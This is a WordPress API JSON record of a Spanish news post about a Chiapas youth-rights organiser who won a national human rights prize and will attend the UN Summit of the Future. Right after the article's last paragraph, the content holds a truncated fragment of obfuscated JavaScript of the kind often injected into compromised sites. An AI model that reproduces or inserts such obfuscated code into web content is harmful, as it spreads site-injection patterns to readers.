{"id":17843,"date":"2024-09-13T03:44:42","date_gmt":"2024-09-13T03:44:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17843"},"modified":"2024-09-13T03:44:43","modified_gmt":"2024-09-13T03:44:43","slug":"sancristobalense-representara-a-mexico-en-la-cumbre-del-futuro-de-la-onu","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17843","title":{"rendered":"Sancristobalense representar\u00e1 a M\u00e9xico en la Cumbre del Futuro de la ONU"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"976\" height=\"563\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240912-WA0039.jpg\" alt=\"\" class=\"wp-image-17844\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240912-WA0039.jpg 976w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240912-WA0039-300x173.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240912-WA0039-768x443.jpg 768w\" sizes=\"auto, (max-width: 976px) 100vw, 976px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>12 de agosto del 2024. San Crist\u00f3bal de Las Casas.- V\u00edctor Germ\u00e1n S\u00e1ntiz Garc\u00eda, coordinador de la organizaci\u00f3n J\u00f3venes Articulando Territorios A.C., ha sido reconocido con el prestigioso Premio Iberoamericano en Derechos Humanos en su fase nacional. Este galard\u00f3n destaca su labor a favor de los derechos de las juventudes chiapanecas, a trav\u00e9s del proyecto &#8220;Juventudes Construyendo Sociedades de Derecho&#8221;.<\/p>\n\n\n\n<p>El proyecto, impulsado por S\u00e1ntiz Garc\u00eda, busca empoderar a las juventudes de Chiapas, promoviendo su participaci\u00f3n activa en la construcci\u00f3n de sociedades m\u00e1s equitativas y respetuosas de los derechos humanos. \u201cEste reconocimiento no es solo para m\u00ed, sino para todas las y los j\u00f3venes que d\u00eda a d\u00eda trabajan por un futuro mejor\u201d, declar\u00f3.<\/p>\n\n\n\n<p>Gracias a este logro, S\u00e1ntiz Garc\u00eda representar\u00e1 a M\u00e9xico en la Cumbre del Futuro, organizada por las Naciones Unidas, que se llevar\u00e1 a cabo del 20 al 23 de septiembre. Este evento re\u00fane a l\u00edderes mundiales y representantes de diversos sectores para dialogar sobre los retos globales y las posibles soluciones para un futuro m\u00e1s justo y sostenible.<\/p>\n\n\n\n<p>La participaci\u00f3n de S\u00e1ntiz Garc\u00eda en esta cumbre internacional no solo pone en alto el nombre de M\u00e9xico, sino que tambi\u00e9n resalta la importancia de incluir a las juventudes en la toma de decisiones globales.<\/p>\n\n\n\n<p>&#8220;Es fundamental que las y los j\u00f3venes sean parte activa en la construcci\u00f3n de sociedades de derecho. Nuestro papel es crucial para lograr un cambio real&#8221;, subray\u00f3 S\u00e1ntiz Garc\u00eda, quien espera que su participaci\u00f3n inspire a m\u00e1s j\u00f3venes a involucrarse en causas sociales y de derechos humanos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 12 de agosto del 2024. San Crist\u00f3bal de Las Casas.- V\u00edctor Germ\u00e1n S\u00e1ntiz Garc\u00eda, coordinador de la organizaci\u00f3n J\u00f3venes Articulando Territorios A.C., ha sido reconocido con el prestigioso Premio Iberoamericano en Derechos Humanos en su fase nacional. Este galard\u00f3n destaca su labor a favor de los derechos de las juventudes chiapanecas, a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17844,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17843","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17843"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17843\/revisions"}],"predecessor-version":[{"id":17845,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17843\/revisions\/17845"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17844"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}